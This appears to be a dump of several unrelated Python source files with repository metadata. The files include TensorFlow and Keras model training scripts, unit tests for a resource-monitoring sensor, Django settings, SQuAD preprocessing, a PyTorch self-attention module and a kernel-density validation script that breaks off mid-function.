# Return the output with logits
return out
# Training computation.
logits = model(tf_train_dataset, keep_prob)
loss = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))
#- Adding the regularization terms to the loss
#beta = 5e-4 #it was: 5e-4 = 0.0005
#loss += (beta * tf.nn.l2_loss(conv1_weights))
#loss += (beta * tf.nn.l2_loss(dense1_weights))
#loss += (beta * tf.nn.l2_loss(layer_out_weights))
loss_summ = tf.summary.scalar("loss", loss)
# Find the batch accuracy and save it in summary
accuracy = tf.equal(tf.argmax(tf_train_labels, 1), tf.argmax(logits, 1))
accuracy = tf.reduce_mean(tf.cast(accuracy, tf.float32))
accuracy_summary = tf.summary.scalar("accuracy", accuracy)
# Optimizer.
# learning_rate = 0.001 #it was: 0.001
global_step = tf.Variable(0, trainable=False) # count the number of steps taken.
#learning_rate = tf.train.exponential_decay(0.000098, global_step, 15000, 0.1, staircase=True)
#lrate_summ = tf.scalar_summary("learning rate", learning_rate)
#optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=global_step)
#optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(loss, global_step=global_step)
#optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001, decay=0.9, momentum=0.0, epsilon=1e-10, use_locking=False, name='RMSProp').minimize(loss, global_step=global_step)
#optimizer = tf.train.AdagradOptimizer(learning_rate=0.00625).minimize(loss, global_step=global_step)
#optimizer = tf.train.MomentumOptimizer(learning_rate=0.0001, momentum=0.95).minimize(loss, global_step=global_step)
optimizer = tf.train.AdadeltaOptimizer(learning_rate=0.001, rho=0.95, epsilon=1e-08, use_locking=False, name='Adadelta').minimize(loss, global_step=global_step)
# Predictions for the training, validation, and test data.
train_prediction = logits
        # Run the model on the held-out test inputs to obtain the predictions used by the test metrics below
test_prediction = model(tf_test_dataset)
_, test_accuracy = tf.metrics.accuracy(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
_, test_recall = tf.metrics.recall(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
_, test_precision = tf.metrics.precision(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
_, test_false_positives = tf.metrics.false_positives(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
_, test_false_negatives = tf.metrics.false_negatives(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
# Save all the variables
saver = tf.train.Saver()
with tf.Session(graph=graph) as session:
# Summary definition
merged_summaries = tf.summary.merge_all()
now = datetime.datetime.now()
log_path = "./logs/log_12net_detection_" + str(now.hour) + str(now.minute) + str(now.second)
writer_summaries = tf.summary.FileWriter(log_path, session.graph)
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
# tf.initialize_all_variables().run()
print('Initialized')
for step in range(tot_epochs):
            # Pick random images in equal number from the positive and negative datasets
quantity_positive = int(batch_size/2)
quantity_negative = batch_size - quantity_positive
indices_positive = np.random.randint(total_positive, size=quantity_positive)
indices_negative = np.random.randint(total_negative, size=quantity_negative)
batch_data = np.concatenate((np.take(train_dataset_positive, indices_positive, axis=0),
np.take(train_dataset_negative, indices_negative, axis=0)))
batch_labels = np.concatenate((np.take(train_label_positive, indices_positive, axis=0),
np.take(train_label_negative, indices_negative, axis=0)))
feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 1.0}
_, acc, l, predictions, my_summary = session.run([optimizer, accuracy, loss, train_prediction, merged_summaries],
feed_dict=feed_dict)
writer_summaries.add_summary(my_summary, step)
if (step % 100 == 0):
print("")
print("Loss at step: ", step, " is " , l)
print("Global Step: " + str(global_step.eval()) + " of " + str(tot_epochs))
#print("Learning Rate: " + str(learning_rate.eval()))
print("Minibatch size: " + str(batch_labels.shape))
print("Accuracy: " + str(acc))
print("")
# Save and test the network
checkpoint_path = "./checkpoints/12net_detection_" + str(now.hour) + str(now.minute) + str(now.second)
if not os.path.exists(checkpoint_path):
os.makedirs(checkpoint_path)
saver.save(session, checkpoint_path + "/cnn_12net_detection" , global_step=step) # save the session
feed_dict = {tf_test_dataset: test_dataset, keep_prob: 1.0}
test_acc, test_rec, test_prec, test_fp, test_fn = session.run([test_accuracy, test_recall, test_precision, test_false_positives, test_false_negatives], feed_dict=feed_dict)
print("# Tot. images tested: " + str(test_dataset.shape[0]))
print("# Test accuracy: " + str(test_acc))
print("# Test recall: " + str(test_rec))
print("# Test precision: " + str(test_prec))
print("# Test false positives: " + str(test_fp))
print("# Test false negatives: " + str(test_fn))
print("")
if __name__ == "__main__":
main()
|
[
"massimiliano.patacchiola@gmail.com"
] |
massimiliano.patacchiola@gmail.com
|
60c39c72e082c9c044c5d0be1a61ab4fa9df1bb3
|
85dde97106860f9d059e9750243ec0e26501d540
|
/Sensor/test/tests.py
|
a43175955355889b52a456f2ace72f2c9990d5e8
|
[] |
no_license
|
tomaszKakol/Monitoring_system_of_distributed_computer_resources
|
f174793fbba6c8ed1419cc61243fb1975e20fb18
|
d6eab21894da75c12e15e59d81b0f3af2f20ee1e
|
refs/heads/master
| 2022-12-13T09:39:38.005336
| 2019-12-03T00:32:14
| 2019-12-03T00:32:14
| 225,493,632
| 0
| 0
| null | 2022-12-08T05:24:29
| 2019-12-03T00:14:30
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,626
|
py
|
import unittest
from source.tools import SensorTools
import platform
from unittest.mock import patch
class TestSensorMethods(unittest.TestCase):
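    """Unit tests for SensorTools: endpoint construction, registration and measurement JSON payloads, and buffered-data copying."""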
def test_set_variables_CPU(self):
metric = "CPU"
name = "testCPU"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
self.assertEqual("http://localhost:8080/v1/hosts", tool.API_REGISTER_ENDPOINT)
self.assertEqual("http://localhost:8080/v1/metrics/testCPU_CPU_Host/measurements", tool.API_CPU_MEASUREMENTS_ENDPOINT)
self.assertEqual("CPU", tool.metric)
self.assertEqual("testCPU", tool.hostID)
self.assertEqual("CPU", tool.type)
self.assertEqual("%", tool.unit)
self.assertEqual("testCPU_CPU_Host", tool.metric_id)
def test_set_variables_battery(self):
metric = "Battery"
name = "testBattery"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
self.assertEqual("http://localhost:8080/v1/hosts", tool.API_REGISTER_ENDPOINT)
self.assertEqual("http://localhost:8080/v1/metrics/testBattery_Battery_Host/measurements", tool.API_BATTERY_MEASUREMENTS_ENDPOINT)
self.assertEqual("Battery", tool.metric)
self.assertEqual("testBattery", tool.hostID)
self.assertEqual("Battery", tool.type)
self.assertEqual("%", tool.unit)
self.assertEqual("testBattery_Battery_Host", tool.metric_id)
def test_set_variables_both(self):
metric = "Both"
name = "testBoth"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
self.assertEqual("http://localhost:8080/v1/hosts", tool.API_REGISTER_ENDPOINT)
self.assertEqual("http://localhost:8080/v1/metrics/testBoth_CPU_Host/measurements", tool.API_CPU_MEASUREMENTS_ENDPOINT)
self.assertEqual("http://localhost:8080/v1/metrics/testBoth_Battery_Host/measurements", tool.API_BATTERY_MEASUREMENTS_ENDPOINT)
self.assertEqual("Both", tool.metric)
self.assertEqual("testBoth", tool.hostID)
self.assertEqual("CPU", tool.type1)
self.assertEqual("%", tool.unit1)
self.assertEqual("testBoth_CPU_Host", tool.metric_id1)
self.assertEqual("Battery", tool.type2)
self.assertEqual("%", tool.unit2)
self.assertEqual("testBoth_Battery_Host", tool.metric_id2)
def test_register_json_data_for_one_metric(self):
right_data = {
'host-id': 'test',
'os': str(platform.system()),
'metrics': [{
'type': 'CPU',
'unit': '%',
'metric-id': 'test_CPU_Host'
}]
}
metric = "CPU"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
data = tool.register_json_data_for_one_metric()
self.assertEqual(right_data, data)
def test_register_json_data_for_two_metric(self):
right_data = {
'host-id': 'test',
'os': str(platform.system()),
'metrics': [{
'type': 'CPU',
'unit': '%',
'metric-id': 'test_CPU_Host'
},
{
'type': 'Battery',
'unit': '%',
'metric-id': 'test_Battery_Host'
}]
}
metric = "Both"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
data = tool.register_json_data_for_two_metrics()
self.assertEqual(right_data, data)
def test_json_data_for_one_metric(self):
right_data = [{'val': '2', 'ts': 1.4}, {'val': '3', 'ts': 1.7}]
metric = "CPU"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.coppy_data()
tool.data_to_send = [2, 3]
tool.data_timestamp_to_send = [1.4, 1.7]
data = tool.json_data_for_one_metric()
self.assertEqual(right_data, data)
def test_json_data_for_two_metrics(self):
right_data = [[{'val': '2', 'ts': 1.4}, {'val': '3', 'ts': 1.7}], [{'val': '5', 'ts': 1.4}, {'val': '6', 'ts': 1.7}]]
metric = "Both"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.coppy_data()
tool.data1_to_send = [2, 3]
tool.data2_to_send = [5, 6]
tool.data_timestamp_to_send = [1.4, 1.7]
data = tool.json_data_for_two_metrics()
self.assertEqual(right_data, data)
def test_copy_data_both(self):
metric = "Both"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.collected_data1 = [2, 3]
tool.collected_data2 = [5, 6]
tool.timestamp = [1.4, 1.7]
tool.coppy_data()
self.assertEqual([2, 3], tool.data1_to_send)
self.assertEqual([5, 6], tool.data2_to_send)
self.assertEqual([1.4, 1.7], tool.data_timestamp_to_send)
self.assertEqual([], tool.collected_data1)
self.assertEqual([], tool.collected_data2)
self.assertEqual([], tool.timestamp)
def test_copy_data_CPU(self):
metric = "CPU"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.collected_data = [2, 3]
tool.timestamp = [1.4, 1.7]
tool.coppy_data()
self.assertEqual([2, 3], tool.data_to_send)
self.assertEqual([1.4, 1.7], tool.data_timestamp_to_send)
self.assertEqual([], tool.collected_data)
self.assertEqual([], tool.timestamp)
def test_data_amount(self):
metric = "CPU"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.timestamp = [1.4, 1.7, 2.2, 3.1, 5.8]
self.assertEqual(5, tool.data_amount())
if __name__ == '__main__':
unittest.main()
|
[
"tomaszkakol19921114@gmail.com"
] |
tomaszkakol19921114@gmail.com
|
ba40a8c5110e9d044b9d98a5e689130a0f613dfb
|
ea384acfec1ae21bc8583258ecaa187ded4b22d6
|
/data/base/prototypes/entity/containers.py
|
59ca9962024efd9710a4f9f126b8bef128a34edd
|
[
"MIT"
] |
permissive
|
cmk1988/Jactorio
|
da03e97d0fa8bfbf9428e45aa2e4772c0ea9542b
|
4056b4c16614d566ec8d90b250621e03645bf4d2
|
refs/heads/master
| 2023-03-28T03:05:24.337666
| 2021-03-13T20:31:30
| 2021-03-13T20:31:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,130
|
py
|
import jactorioData as j
# An item will be created with the name {name}-item | With `wooden-chest`: `wooden-chest-item`
def addContainer(name, invSize, health, worldSprite, itemSprite):
(j.ContainerEntity(name)
.tileWidth(1)
.tileHeight(1)
.maxHealth(health)
.inventorySize(invSize)
.pickupTime(0.1)
.sprite(
j.Sprite()
.load(worldSprite)
)
.item(
j.Item(name + "-item")
.sprite(
j.Sprite()
.load(itemSprite)
)
)
)
addContainer("wooden-chest", 16, 100,
"base/graphics/entity/wooden-chest/hr-wooden-chest.png",
"base/graphics/entity/wooden-chest/wooden-chest.png")
addContainer("iron-chest", 32, 200,
"base/graphics/entity/iron-chest/hr-iron-chest.png",
"base/graphics/entity/iron-chest/iron-chest.png")
addContainer("steel-chest", 48, 350,
"base/graphics/entity/steel-chest/hr-steel-chest.png",
"base/graphics/entity/steel-chest/steel-chest.png")
|
[
"jaihysc@gmail.com"
] |
jaihysc@gmail.com
|
2c2b933d610693ff63ffe94f0c0b0df46fd2d16c
|
a0e4b984638355a67ec50efcb60cf7e945daafe7
|
/sigid/example.py
|
d98f550f8516a86323f11365fb9ced534fbf718b
|
[] |
no_license
|
MrSaints/data-engineer-assignment-sigid
|
7de3ad27a4dd8efeb511bff741a1218cc483fb14
|
16519f5bad9e6f7b7da37f719a4e176808d8a012
|
refs/heads/master
| 2020-04-17T04:22:35.507844
| 2019-01-28T10:16:31
| 2019-01-28T10:17:33
| 166,227,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
from typing import List
from sigid.mock_asset_service import MockAssetService
from sigid.mock_signature_repository import MockSignatureRepository
from sigid.mock_signee_repository import MockSigneeRepository
from sigid.service import (
AnyNewSignature,
NewImageSignature,
NewXYZSignature,
SignatureApplicationService,
)
if __name__ == "__main__":
# Data stores
signee_repository = MockSigneeRepository()
signature_repository = MockSignatureRepository()
# Services
asset_service = MockAssetService()
application = SignatureApplicationService(
signee_repository=signee_repository,
signature_repository=signature_repository,
asset_service=asset_service,
)
# Test data
test_signatures: List[AnyNewSignature] = [
NewImageSignature(local_uri="/tmp/does_not_actually_exist"),
# [ (X, Y, Z) ... n ]
NewXYZSignature(points=[(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)]),
]
# Use test data
application.register_signatures(test_signatures)
# Check if test data is stored in the mock data stores
print("Signees:", signee_repository.signee_by_id)
print("Signatures:", signature_repository.signatures_by_signee_id)
print("Assets:", asset_service.asset_by_id)
|
[
"ian@fyianlai.com"
] |
ian@fyianlai.com
|
24d36a2217c9007fbb6bd84f731969b932ae222c
|
3cfca574323bf9c1955b5e543d3b9335c4072b64
|
/magalu_api/settings.py
|
a7423a645db27b17b94b3982521544d0bd151a98
|
[] |
no_license
|
otavioremedio/magalu_python
|
ece99deb7288fda676e061b1ee984d2a51ad0f93
|
4df8b148ffaa0c113ad619a82b42b0e90a5172e1
|
refs/heads/master
| 2020-06-05T14:54:23.292517
| 2019-06-18T04:28:54
| 2019-06-18T04:28:54
| 192,465,249
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,179
|
py
|
"""
Django settings for magalu_api project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-s7s%(uc(sz9co@66h*!e2!!z(m0860bytdg6qobn&4l7wy23e'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'magalu',
'rest_framework'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'magalu_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'magalu_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"otavioremedio@gmail.com"
] |
otavioremedio@gmail.com
|
be93bf7f1663533f7ff527947dde250cdbb03ee5
|
07cc1454dd3c2782e0459aead9c950b603bdd613
|
/code/process_squad.py
|
bfb81312c6affabb55db28f8ac15c7e2315e8fce
|
[] |
no_license
|
muhammadyaseen/snlp-project
|
ae733e5e399470f16fb26b1f02ae141b997280f7
|
a9f491a786632fff316846d5a3399479928db863
|
refs/heads/master
| 2022-12-03T22:06:07.104215
| 2020-08-19T09:13:41
| 2020-08-19T09:13:41
| 285,236,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,516
|
py
|
"""
The purpose of this processing script is to convert the SQuAD dataset
in a similar format to WikiQA dataset so that we can use it with the
built-in data loader and use it in pairwise ranking setting.
"""
import json
SQUAD_ROOT = "/home/yaseen/Course Work/snlp-project/data/"
SQUAD_DEV = SQUAD_ROOT + "dev-v1.1.json"
SQUAD_TRAIN = SQUAD_ROOT + "train-v1.1.json"
SQUAD_DEV_P = SQUAD_ROOT + "dev-v1.1-processed.json"
SQUAD_TRAIN_P = SQUAD_ROOT + "train-v1.1-processed.json"
def load_and_process(path=SQUAD_DEV):
data_json = json.load(open(path,'r'))
# list of pages, where each element has 'title' and 'paragraphs' keys.
# title is title of Wiki page and, paragraphs are paras from that page
# Each title/pages contains list of paragraph objects which consist of
# 'context' and 'question-answers' i.e. 'qas'
pages = data_json['data']
for wiki_page in pages:
pg_title = wiki_page['title']
pg_paras = wiki_page['paragraphs'] # list object - with context and qas keys
for para in pg_paras:
print("\n\n")
print(para['context'])
print("\n\n")
for qa in para['qas']:
q = qa['question']
print("\nQuestion: ", q)
ans_texts = set([ans_text['text'] for ans_text in qa['answers']])
print(ans_texts)
break
break
if __name__ == "__main__":
load_and_process(SQUAD_DEV)
print("done")
|
[
"mohammad_yaseen13@live.com"
] |
mohammad_yaseen13@live.com
|
7ebdf48974f905586bd57d67bca70a0a4286bf9c
|
017d4134fea04d32d31c85fd8457b3ef8ac86bf4
|
/ceshi.py
|
e270ea78f02f327f5a4e35414c1d730b7ac1b1e4
|
[] |
no_license
|
qiuxianruoke/ZhuTian_for_python
|
4e2f9111c1eed4146e10f4a8151da22f1342afa4
|
9e4c75503b71d0c2af82426b4d68d23f9af62c9e
|
refs/heads/master
| 2023-09-03T04:49:53.605599
| 2021-10-16T13:38:01
| 2021-10-16T13:38:01
| 331,208,931
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 107
|
py
|
a = [1, 2, 3, 4, 5]
#print(a[0])
l = len(a)
# Removing items while indexing into the shrinking list raises IndexError,
# so iterate over a copy and remove each element from the original.
for x in list(a):
    a.remove(x)
    print(x, '\n')
|
[
"3237276907@qq.com"
] |
3237276907@qq.com
|
af2e52b46844239c7c94bcf9148beaf21690047d
|
f7ab3bcf18edf83219898d1e512161e61261a31b
|
/xbowflow/scripts/xflow-stat
|
b7221c8f442df9d5bd1ac1010995e52a7aa3f097
|
[
"MIT"
] |
permissive
|
shozebhaider/Project-Xbow
|
1e98446cc91c23844f516f62c8b2f044bb6b0936
|
079a5ebf730b5a3cb605b48fac51e721bc293ff8
|
refs/heads/master
| 2020-05-26T00:08:21.882915
| 2019-05-22T11:26:14
| 2019-05-22T11:26:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,141
|
#!/usr/bin/env python
from __future__ import print_function
from xbowflow._version import __version__
from xbowflow.clients import dask_client
import argparse
def stat(client, args):
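    # Print per-worker core and task counts, or a one-word Idle/Busy summary when --summary is given.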
info = (client.scheduler_info())
if not args.summary:
print(' {:30s} {:7s} {:9s} {:9s}'.format('Worker name', 'ncores', 'executing', 'in_memory'))
for worker in info['workers']:
print('{name:30s} {ncores:5d} {metrics[executing]:9d} {metrics[in_memory]:9d}'.format(**info['workers'][worker]))
else:
n_ex = 0
for worker in info['workers']:
n_ex += int(info['workers'][worker]['metrics']['executing'])
if n_ex == 0:
print('Idle')
else:
print('Busy')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Report on the status of the xbow cluster')
parser.add_argument('--summary', '-s', action='store_true', help='Summary information only')
parser.add_argument('-V', '--version', action='version', version=__version__)
args = parser.parse_args()
client = dask_client()
stat(client, args)
client.close()
|
[
"charles.laughton@nottingham.ac.uk"
] |
charles.laughton@nottingham.ac.uk
|
|
e2c44190d4a0c77a111d4d07700decfd13262c29
|
1925aa0e43b35cfeb65f6bbc5ca9c2a6d75ffd52
|
/visdial/common/self_attention.py
|
40128fce6d9627c2baf1f6db3825edbdcd76c59b
|
[] |
no_license
|
davidnvq/visdial
|
07dbfabd1852ca6c24d4e420c96180978de5e731
|
ab6fa3f2d84690c981f512c29f1de72330ed38b2
|
refs/heads/master
| 2023-07-03T05:36:02.101352
| 2021-08-05T12:41:18
| 2021-08-05T12:41:18
| 185,401,550
| 33
| 6
| null | 2020-11-18T22:46:30
| 2019-05-07T12:52:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,496
|
py
|
import torch
import torch.nn as nn
class SelfAttention(nn.Module):
"""This module perform self-attention on an utility
to summarize it into a single vector."""
def __init__(self, hidden_size):
super(SelfAttention, self).__init__()
self.attn_linear = nn.Sequential(
nn.Linear(hidden_size, hidden_size),
nn.ReLU(inplace=True),
nn.Linear(hidden_size, 1)
)
self.attn_weights = None
def forward(self, x, mask_x):
"""
Arguments
---------
x: torch.FloatTensor
The input tensor which is a sequence of tokens
Shape [batch_size, M, hidden_size]
mask_x: torch.LongTensor
The mask of the input x where 0 represents the <PAD> token
Shape [batch_size, M]
Returns
-------
summarized_vector: torch.FloatTensor
The summarized vector of the utility (the context vector for this utility)
Shape [batch_size, hidden_size]
"""
# shape [bs, M, 1]
attn_weights = self.attn_linear(x)
attn_weights = attn_weights.masked_fill(mask_x.unsqueeze(-1) == 0, value=-9e10)
attn_weights = torch.softmax(attn_weights, dim=-2)
self.attn_weights = attn_weights
# shape [bs, 1, hidden_size]
summarized_vector = torch.matmul(attn_weights.transpose(-2, -1), x)
summarized_vector = summarized_vector.squeeze(dim=-2)
return summarized_vector
|
[
"quanguet@gmail.com"
] |
quanguet@gmail.com
|
369ed13baeabeb36c71b262ee12e2fc17e7e2eb6
|
a4b3245401e80dc6f19065bf2b9c54686a64b6cc
|
/Stack.py
|
a4b40b0d5469030c8bfbf2d0014a7cdb46590ca7
|
[] |
no_license
|
karim-eddin/python-datastructure
|
5277cc11f88957925631066959b048c9372e0f48
|
ec8579174c60182c241f808f1f9ee6c50588e690
|
refs/heads/master
| 2023-02-27T23:27:03.666084
| 2021-02-11T10:40:46
| 2021-02-11T10:40:46
| 335,523,409
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 549
|
py
|
#encoding=utf-8
class Stack:
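    """A minimal list-backed stack; top() and pop() return None when the stack is empty."""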
    def __init__(self):
        # Use an instance attribute so separate Stack objects do not share one list.
        self.stk_lst = []
def top(self):
if len(self.stk_lst) == 0:
return None
else:
return self.stk_lst[-1]
def length(self):
return len(self.stk_lst)
def pop(self):
if len(self.stk_lst) == 0:
return None
else:
self.stk_lst.pop()
def push(self, value):
self.stk_lst.append(value)
def output(self):
for val in self.stk_lst:
print(str(val))
|
[
"karimeddinn@hotmail.com"
] |
karimeddinn@hotmail.com
|
287490e47c0c860a01c42ee7aae05e6c42c86fdd
|
a82e0bd93cb966fefbea8795589768eb5a5a65c0
|
/model.py
|
c92716d9fb093a724e46f93e5f9ebc8bbcd776c7
|
[
"MIT"
] |
permissive
|
bfmat/StopSignFinder
|
1b9e935fc1471218df37d4830a84a854985eec8c
|
8d41b86a28f1c48ba23e504ccb65f60115ef29f6
|
refs/heads/master
| 2021-09-13T06:20:32.587140
| 2018-04-25T21:24:57
| 2018-04-25T21:24:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,332
|
py
|
from keras.layers import Dense, Flatten
from keras.layers.convolutional import Conv2D
from keras.models import Sequential
# A very simple convolutional neural network model that will be used to predict the probability of the presence of a
# stop sign in a small square image
# Created by brendon-ai, January 2018
# Main function to create model
def get_model(window_size):
# Hyperbolic tangent activation function
activation = 'tanh'
# Initialize the Sequential model
model = Sequential()
    # Three convolutional layers
model.add(Conv2D(
input_shape=(window_size, window_size, 3),
kernel_size=4,
filters=16,
activation=activation
))
model.add(Conv2D(
kernel_size=3,
filters=64,
activation=activation
))
model.add(Conv2D(
kernel_size=2,
filters=64,
activation=activation
))
# Fully connected layers
model.add(Flatten())
model.add(Dense(64, activation=activation))
model.add(Dense(8, activation=activation))
# Sigmoid activation is used for the last layer because its outputs are in the range of 0 to 1
model.add(Dense(1, activation='sigmoid'))
# Compile model with Adadelta optimizer
model.compile(
loss='mse',
optimizer='adadelta'
)
return model
|
[
"brendon-m@outlook.com"
] |
brendon-m@outlook.com
|
4598001c5648f08752ef2002d4ba2a58a4b810b4
|
94e06376dc265c7bf1a2e51acb9714d02b21503a
|
/python打卡/day9_数字.py
|
0303d4bab06f6795e5925726a39bafdecf382745
|
[] |
no_license
|
zhangquanliang/python
|
4b2db32bed4e4746c8c49c309563f456dc41c6be
|
f45ef96e385b1cd6c5dfb53bf81042d953a9ec46
|
refs/heads/master
| 2021-04-26T23:30:12.217397
| 2019-03-20T06:18:14
| 2019-03-20T06:18:14
| 124,005,916
| 11
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
# -*- coding: utf-8 -*-
# 1. Sum all the values in a nested list of integers
def nested_sum(t):
a = 0
for x in t:
for y in x:
a += y
print(a)
# 2. Take a list of numbers and return the list of cumulative sums
def cumsum(t):
list = []
a = 0
for x in t:
a += x
list.append(a)
print(list)
# 3. Take a list and return a new list with every value except the first and last elements
def middle(t):
t.pop(0)
t.pop()
print(t)
# t = [1, 2, 3, 4, 1212, 121]
# middle(t)
# 4. Fibonacci sequence
a, b = 0, 1
for i in range(1, 13):
    print('Month %s: %s pairs of rabbits' % (i, b))
a, b = b, a + b
|
[
"1007228376@qq.com"
] |
1007228376@qq.com
|
06f43a44fe4cb0a5dafc0a5b71287555443fcdce
|
39a3794a754e4e1972e7e60cbed27ac5759078ac
|
/kde_validation_bio_sim_record_result.py
|
7fbb7bab3c98dd8db1004b8ba41d06c13ea36456
|
[] |
no_license
|
Polina17/Epilepsy_Validation
|
87bcaea99be79921510bb11926bda34360b1b639
|
fbb57a935098ab8829c682e9fd5c23980c09d457
|
refs/heads/master
| 2023-02-26T15:11:51.135080
| 2021-02-02T14:52:41
| 2021-02-02T14:52:41
| 327,878,462
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,840
|
py
|
# Script for computing the p_value between the bio and simulated data
# when a cosine kernel is applied to the normalized data and to the normalized
# filtered data, with plotting of the results
import math
import matplotlib.pyplot as plt
import scipy.integrate
from numpy import inf, exp
import scipy.io
# function for computing the mean of a sample
def mean(array):
sum = 0
for elem in array:
sum += elem
result = sum/len(array)
return result
# function for computing the standard deviation of a sample
def standart_deviation(array):
sqr_sum = 0
for elem in array:
sqr_sum += math.pow(elem, 2)
result = sqr_sum/len(array) - math.pow(mean(array), 2)
return math.sqrt(result)
# function for normalizing the data (subtract the mean / divide by the standard deviation)
def normal(array): # normalize the input array
result = []
mean_value = mean(array)
standart_dev_value = standart_deviation(array)
for elem in array:
e = (elem-mean_value)/standart_dev_value
result.append(e)
return result
# function for computing the sum of the cosine-kernel values at a given point
def kernel_cos_sum(array, x, h): # array - the sample, x - the point at which the density is evaluated, h - smoothing parameter (bandwidth)
sum = 0
for elem in array:
u = (x - elem)/h
if (math.fabs(u) <= 1):
K = (math.pi/4) * math.cos(u*math.pi/2)
else:
K = 0
sum +=K
return sum
# function for computing the probability density values at the given points
# array - the sample
# h - smoothing parameter (bandwidth)
# values - points at which the density is evaluated
# type - kernel type
def density_estim(array, h, values, type):
result = []
for elem in values:
if (type == 'cos'):
result.append(kernel_cos_sum(array, elem, h) * (1 / (len(array) * h)))
return result
# function for computing the within-sample kernel term of the
# biological data, used in the test statistic
def difference_bio(bio, h_bio):
sum = 0
for elem in bio:
for el in bio:
u = (elem-el) / h_bio
if (math.fabs(u) <= 1):
K = (math.pi / 4) * math.cos(u * math.pi / 2)
else:
K = 0
sum += K
result = sum / (math.pow(len(bio), 2) * h_bio)
return result
# function for computing the within-sample kernel term of the
# simulated data, used in the test statistic
def difference_neuron(neuron, h_neuron):
sum = 0
for elem in neuron:
for el in neuron:
u = (elem - el) / h_neuron
if (math.fabs(u) <= 1):
K = (math.pi / 4) * math.cos(u * math.pi / 2)
else:
K = 0
sum += K
result = sum / (math.pow(len(neuron), 2) * h_neuron)
return result
# function for computing the cross kernel term between the simulated and biological data
# with the bandwidth of the bio data,
# used in the test statistic
def difference_bio_neuron_h_bio(bio, neuron, h_bio):
sum = 0
for elem in bio:
for el in neuron:
u = (elem - el) / h_bio
